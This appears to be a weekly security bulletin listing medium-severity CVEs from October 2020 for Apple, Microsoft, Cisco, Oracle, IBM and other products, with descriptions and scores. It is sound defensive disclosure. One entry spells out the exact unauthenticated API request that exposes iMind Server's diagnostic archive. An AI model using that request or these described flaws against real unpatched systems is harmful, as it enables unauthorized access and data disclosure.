apple — ipad_os A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. A local user may be able to read kernel memory. 2020-10-16 4.9 CVE-2020-9964
MISC
apple — ipad_os This issue was addressed with improved checks. This issue is fixed in iOS 14.0 and iPadOS 14.0, watchOS 7.0. The screen lock may not engage after the specified time period. 2020-10-16 4.6 CVE-2020-9946
MISC
MISC
apple — ipad_os An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9889
MISC
MISC
MISC
MISC
apple — ipad_os An authorization issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to read sensitive location information. 2020-10-16 4.3 CVE-2020-9933
MISC
MISC
MISC
apple — ipad_os A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-16 6.8 CVE-2020-9878
MISC
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations. 2020-10-16 4.3 CVE-2020-9909
MISC
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9891
MISC
MISC
MISC
MISC
apple — ipad_os A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to break out of its sandbox. 2020-10-16 6.8 CVE-2020-9865
MISC
MISC
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9888
MISC
MISC
MISC
MISC
apple — ipad_os An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9884
MISC
apple — ipad_os A logic issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. An attacker with memory write capability may be able to bypass pointer authentication codes and run arbitrary code. 2020-10-16 6.5 CVE-2020-9870
MISC
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9890
MISC
MISC
MISC
MISC
apple — safari An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to code execution. 2020-10-16 6.8 CVE-2020-9983
MISC
apple — safari A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. An issue in Safari Reader mode may allow a remote attacker to bypass the Same Origin Policy. 2020-10-16 5 CVE-2020-9911
MISC
MISC
apple — safari A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. A malicious attacker may cause Safari to suggest a password for the wrong domain. 2020-10-16 5 CVE-2020-9903
MISC
MISC
apple — safari A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9948
MISC
apple — safari A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9951
MISC
appneta — tcpreplay An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in get_l2len() that can make tcpprep crash and cause a denial of service. 2020-10-19 5 CVE-2020-24266
MISC
appneta — tcpreplay An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in MemcmpInterceptorCommon() that can make tcpprep crash and cause a denial of service. 2020-10-19 5 CVE-2020-24265
MISC
boltbrowser — bolt_browser User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of Danyil Vasilenko’s Bolt Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the Bolt Browser version 1.4 and prior versions. 2020-10-20 4.3 CVE-2020-7370
MISC
MISC
cisco — firepower_threat_defense A vulnerability in the ingress packet processing path of Cisco Firepower Threat Defense (FTD) Software for interfaces that are configured either as Inline Pair or in Passive mode could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient validation when Ethernet frames are processed. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device. A successful exploit could allow the attacker to do either of the following: Fill the /ngfw partition on the device: A full /ngfw partition could result in administrators being unable to log in to the device (including logging in through the console port) or the device being unable to boot up correctly. Note: Manual intervention is required to recover from this situation. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition. Cause a process crash: The process crash would cause the device to reload. No manual intervention is necessary to recover the device after the reload. 2020-10-21 6.1 CVE-2020-3577
CISCO
cisco — firepower_threat_defense A vulnerability in the TCP Intercept functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured Access Control Policies (including Geolocation) and Service Policies on an affected system. The vulnerability exists because TCP Intercept is invoked when the embryonic connection limit is reached, which can cause the underlying detection engine to process the packet incorrectly. An attacker could exploit this vulnerability by sending a crafted stream of traffic that matches a policy on which TCP Intercept is configured. A successful exploit could allow the attacker to match on an incorrect policy, which could allow the traffic to be forwarded when it should be dropped. In addition, the traffic could incorrectly be dropped. 2020-10-21 4.3 CVE-2020-3565
CISCO
cisco — firepower_threat_defense A vulnerability in the ssl_inspection component of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to crash Snort instances. The vulnerability is due to insufficient input validation in the ssl_inspection component. An attacker could exploit this vulnerability by sending a malformed TLS packet through a Cisco Adaptive Security Appliance (ASA). A successful exploit could allow the attacker to crash a Snort instance, resulting in a denial of service (DoS) condition. 2020-10-21 5 CVE-2020-3317
CISCO
clamxav — clamxav An issue was discovered in ClamXAV 3 before 3.1.1. A malicious actor could use a properly signed copy of ClamXAV 2 (running with an injected malicious dylib) to communicate with ClamXAV 3’s helper tool and perform privileged operations. This occurs because of inadequate client verification in the helper tool. 2020-10-16 4.6 CVE-2020-26893
MISC
cminds — cm_download_manager The cm-download-manager plugin before 2.8.0 for WordPress allows XSS. 2020-10-21 4.3 CVE-2020-27344
MISC
MISC
dell — emc_networker Dell EMC NetWorker versions prior to 19.3.0.2 contain an incorrect privilege assignment vulnerability. A non-LDAP remote user with low privileges may exploit this vulnerability to perform ‘saveset’ related operations in an unintended manner. The vulnerability is not exploitable by users authenticated via LDAP. 2020-10-16 4 CVE-2020-26182
CONFIRM
dell — emc_networker Dell EMC NetWorker versions prior to 19.3.0.2 contain an improper authorization vulnerability. Certain remote users with low privileges may exploit this vulnerability to perform ‘nsrmmdbd’ operations in an unintended manner. 2020-10-16 4 CVE-2020-26183
CONFIRM
gitea — gitea ** DISPUTED ** The git hook feature in Gitea 1.1.0 through 1.12.5 allows for authenticated remote code execution. NOTE: The vendor has indicated this is not a vulnerability and states “This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.” 2020-10-16 6.5 CVE-2020-14144
MISC
MISC
MISC
MISC
MISC
gogs — gogs The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution. 2020-10-16 6.5 CVE-2020-15867
MISC
gopro — gpmf-parser GoPro gpmf-parser through 1.5 has a stack out-of-bounds write vulnerability in GPMF_ExpandComplexTYPE(). Parsing malicious input can result in a crash or potentially arbitrary code execution. 2020-10-19 6.8 CVE-2020-16158
MISC
MISC
huawei — mate_20_firmware HUAWEI Mate 20 versions earlier than 10.0.0.188(C00E74R3P8) have a buffer overflow vulnerability in the Bluetooth module. Due to insufficient input validation, an unauthenticated attacker may craft Bluetooth messages after successful pairing, causing a buffer overflow. Successful exploit may cause code execution. 2020-10-19 5.4 CVE-2020-9113
MISC
huawei — mate_30_firmware HUAWEI Mate 30 versions earlier than 10.1.0.150(C00E136R5P3) and HUAWEI P30 versions earlier than 10.1.0.160(C00E160R2P11) have a use after free vulnerability. A condition exists in which the system would reference memory after it has been freed. The attacker must trick the user into running a crafted application with common privilege; successful exploit could cause code execution. 2020-10-19 6.8 CVE-2020-9263
MISC
ibm — elastic_storage_server IBM Spectrum Scale V4.2.0.0 through V4.2.3.23 and V5.0.0.0 through V5.0.5.2 as well as IBM Elastic Storage System 6.0.0 through 6.0.1.0 could allow a local attacker to invoke a subset of ioctls on the device with invalid arguments that could crash the kernel and cause a denial of service. IBM X-Force ID: 188599. 2020-10-20 4.9 CVE-2020-4756
XF
CONFIRM
CONFIRM
ibm — resilient_security_orchestration_automation_and_response IBM Resilient OnPrem 38.2 could allow a privileged user to inject malicious commands through Python3 scripting. IBM X-Force ID: 185503. 2020-10-16 6.5 CVE-2020-4636
XF
CONFIRM
ibm — security_guardium_big_data_intelligence IBM Security Guardium Big Data Intelligence 1.0 (SonarG) uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 175560. 2020-10-16 5 CVE-2020-4254
XF
CONFIRM
ibm — spectrum_scale IBM Spectrum Scale 5.0.0 through 5.0.5.2 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 188518. 2020-10-20 4.3 CVE-2020-4749
XF
CONFIRM
ibm — spectrum_scale IBM Spectrum Scale 5.0.0 through 5.0.5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188517. 2020-10-20 4.3 CVE-2020-4748
XF
CONFIRM
ibm — sterling_b2b_integrator IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.2.2 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 171733. 2020-10-20 6.5 CVE-2019-4680
XF
CONFIRM
infinispan — infinispan A flaw was found in Infinispan version 10, where it permits local access to controls via both REST and HotRod APIs. This flaw allows a user authenticated to the local machine to perform all operations on the caches, including the creation, update, deletion, and shutdown of the entire server. 2020-10-19 5.6 CVE-2020-10746
MISC
libass_project — libass In libass 0.14.0, the `ass_outline_construct`’s call to `outline_stroke` causes a signed integer overflow. 2020-10-16 6.8 CVE-2020-26682
MISC
MISC
magento — magento Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by a persistent XSS vulnerability that allows users to upload malicious JavaScript via the file upload component. This vulnerability could be abused by an unauthenticated attacker to execute XSS attacks against other Magento users. This vulnerability requires a victim to browse to the uploaded file. 2020-10-16 4.3 CVE-2020-24408
MISC
microsoft — .net_framework An information disclosure vulnerability exists when the .NET Framework improperly handles objects in memory, aka ‘.NET Framework Information Disclosure Vulnerability’. 2020-10-16 4.3 CVE-2020-16937
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16931. 2020-10-16 6.8 CVE-2020-16932
MISC
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16931, CVE-2020-16932. 2020-10-16 6.8 CVE-2020-16930
MISC
MISC
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16930, CVE-2020-16931, CVE-2020-16932. 2020-10-16 6.8 CVE-2020-16929
MISC
MISC
microsoft — 365_apps An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934. 2020-10-16 6.8 CVE-2020-16955
MISC
microsoft — 365_apps An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955. 2020-10-16 6.8 CVE-2020-16934
MISC
microsoft — 365_apps An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955. 2020-10-16 6.8 CVE-2020-16928
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka ‘Microsoft Office Remote Code Execution Vulnerability’. 2020-10-16 6.8 CVE-2020-16954
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16932. 2020-10-16 6.8 CVE-2020-16931
MISC
MISC
microsoft — exchange_server An information disclosure vulnerability exists in how Microsoft Exchange validates tokens when handling certain messages, aka ‘Microsoft Exchange Information Disclosure Vulnerability’. 2020-10-16 4.3 CVE-2020-16969
MISC
microsoft — sharepoint_enterprise_server An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16950. 2020-10-16 4 CVE-2020-16953
MISC
microsoft — sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16951. 2020-10-16 6.8 CVE-2020-16952
MISC
MISC
microsoft — sharepoint_enterprise_server An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16950, CVE-2020-16953. 2020-10-16 4 CVE-2020-16948
MISC
microsoft — sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16952. 2020-10-16 6.8 CVE-2020-16951
MISC
microsoft — sharepoint_server An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16953. 2020-10-16 4.3 CVE-2020-16950
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16973
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka ‘Microsoft Windows Codecs Library Remote Code Execution Vulnerability’. 2020-10-16 6.8 CVE-2020-17022
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka ‘Group Policy Elevation of Privilege Vulnerability’. 2020-10-16 4.6 CVE-2020-16939
MISC
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16972
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16912
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16974
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16975
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16909. 2020-10-16 4.6 CVE-2020-16905
MISC
microsoft — windows_10 A security feature bypass vulnerability exists when Microsoft Windows fails to handle file creation permissions, which could allow an attacker to create files in a protected Unified Extensible Firmware Interface (UEFI) location. To exploit this vulnerability, an attacker could run a specially crafted application to bypass Unified Extensible Firmware Interface (UEFI) variable security in Windows. The security update addresses the vulnerability by correcting security feature behavior to enforce permissions, aka ‘Windows Security Feature Bypass Vulnerability’. 2020-10-16 4.3 CVE-2020-16910
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975. 2020-10-16 4.6 CVE-2020-16976
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16876. 2020-10-16 4.6 CVE-2020-16920
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Remote Code Execution Vulnerability’. 2020-10-16 5.8 CVE-2020-16898
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16905. 2020-10-16 4.6 CVE-2020-16909
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16920. 2020-10-16 4.6 CVE-2020-16876
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976. 2020-10-16 4.6 CVE-2020-16936
MISC
microsoft — windows_10 A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system. To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application. The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests, aka ‘Windows Hyper-V Denial of Service Vulnerability’. 2020-10-16 4.6 CVE-2020-1243
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka ‘Windows Storage Services Elevation of Privilege Vulnerability’. 2020-10-16 4.6 CVE-2020-0764
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-1167. 2020-10-16 6.8 CVE-2020-16923
MISC
microsoft — windows_10 A remote code execution vulnerability exists when Windows Network Address Translation (NAT) fails to properly handle UDP traffic, aka ‘Windows NAT Remote Code Execution Vulnerability’. 2020-10-16 6.8 CVE-2020-16894
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles junction points, aka ‘Windows – User Profile Service Elevation of Privilege Vulnerability’. 2020-10-16 4.9 CVE-2020-16940
MISC
MISC
microsoft — windows_10 An information disclosure vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability’. 2020-10-16 5 CVE-2020-16896
MISC
microsoft — windows_10 A denial of service vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Denial of Service Vulnerability’. 2020-10-16 5 CVE-2020-16949
MISC
microsoft — windows_10 A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka ‘Media Foundation Memory Corruption Vulnerability’. 2020-10-16 6.8 CVE-2020-16915
MISC
MISC
microsoft — windows_10 A security feature bypass vulnerability exists in Microsoft Word software when it fails to properly handle .LNK files, aka ‘Microsoft Word Security Feature Bypass Vulnerability’. 2020-10-16 6.8 CVE-2020-16933
MISC
microsoft — windows_server_2012 An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations, aka ‘Windows iSCSI Target Service Elevation of Privilege Vulnerability’. 2020-10-16 4.6 CVE-2020-16980
MISC
mind — imind_server InterMind iMind Server through 3.13.65 allows remote unauthenticated attackers to read the self-diagnostic archive via a direct api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1 request. 2020-10-20 5 CVE-2020-24765
MISC
mozilla — network_security_services A flaw was found in the way NSS handled CCS (ChangeCipherSpec) messages in TLS 1.3. This flaw allows a remote attacker to send multiple CCS messages, causing a denial of service for servers compiled with the NSS library. The highest threat from this vulnerability is to system availability. This flaw affects NSS versions before 3.58. 2020-10-20 5 CVE-2020-25648
MISC
MISC
nagios — nagios_xi Improper neutralization of argument delimiters in a command in Nagios XI 5.7.3 allows a remote, authenticated admin user to write to arbitrary files and ultimately execute code with the privileges of the apache user. 2020-10-20 6.5 CVE-2020-5792
MISC
nagios — nagios_xi Cross-site request forgery in Nagios XI 5.7.3 allows a remote attacker to perform sensitive application actions by tricking legitimate users into clicking a crafted link. 2020-10-20 4.3 CVE-2020-5790
MISC
olimpoks — olimpok OLIMPOKS under 3.3.39 allows Auth/Admin ErrorMessage XSS. A remote attacker can use the discovered vulnerability to inject a malicious JavaScript payload into victims’ browsers in the context of the vulnerable application. The executed code can be used to steal the administrator’s cookies, influence the HTML content of the targeted application and perform phishing-related attacks. The vulnerable application is used in more than 3000 organizations in different sectors from retail to industries. 2020-10-16 4.3 CVE-2020-16270
MISC
MISC
MISC
oracle — application_express Vulnerability in the Oracle Application Express Data Reporter component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Data Reporter. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Data Reporter, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Data Reporter accessible data as well as unauthorized read access to a subset of Oracle Application Express Data Reporter accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14899
MISC
oracle — application_express Vulnerability in the Oracle Application Express Group Calendar component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Group Calendar. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Group Calendar, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Group Calendar accessible data as well as unauthorized read access to a subset of Oracle Application Express Group Calendar accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14900
oracle — application_express Vulnerability in the Oracle Application Express component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having SQL Workshop privilege with network access via HTTP to compromise Oracle Application Express. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express accessible data as well as unauthorized read access to a subset of Oracle Application Express accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14762
oracle — application_express Vulnerability in the Oracle Application Express Packaged Apps component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Packaged Apps. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Packaged Apps, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Packaged Apps accessible data as well as unauthorized read access to a subset of Oracle Application Express Packaged Apps accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14898
oracle — application_express Vulnerability in the Oracle Application Express Quick Poll component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Quick Poll. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Quick Poll, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Quick Poll accessible data as well as unauthorized read access to a subset of Oracle Application Express Quick Poll accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 4.9 CVE-2020-14763
oracle — applications_framework Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Popup windows). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 5.8 CVE-2020-14746
oracle — applications_manager Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: AMP EBS Integration). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 5 CVE-2020-14811
